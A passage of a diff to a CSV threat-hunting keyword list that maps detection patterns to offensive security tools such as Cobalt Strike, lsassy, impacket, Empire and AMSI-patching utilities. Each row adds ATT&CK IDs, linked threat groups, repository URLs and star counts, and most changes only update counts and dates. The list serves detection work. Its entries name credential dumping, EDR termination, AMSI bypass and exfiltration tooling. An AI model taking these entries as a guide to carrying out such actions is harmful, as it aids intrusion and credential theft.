Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider 
- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*templates*CSExec.cs*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*templates*HIPS_LIPS_processes.txt*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*templates*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*tenable.com/downloads/nessus*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Terminating Windows Defender?*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - 
T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*test.endpoint.rapid7.com*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*test_invoke_bof.x64.o*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*test_litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" -"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*test_mitm_initialization.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "*test_nanodump_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - 
T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a 
variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*Test-ContainsAmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Test-DllExists*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*tester@egress-assess.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*Test-ServiceDaclPermission*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*TestWinRMMachines*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*tevora-threat/SharpView/*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*text_to_shellcode\*.exe*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","","N/A","","","" -"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*tgscrack.go*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*tgsrepcrack.*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tgsrepcrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" 
@@ -17638,27 +17822,27 @@ "*tgtParse.py *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*th3rd/heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*TH3xACE/EDR-Test*","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","140","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" -"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*TheD1rkMtr/AMSI_patch*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*TheD1rkMtr/D1rkInject*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - 
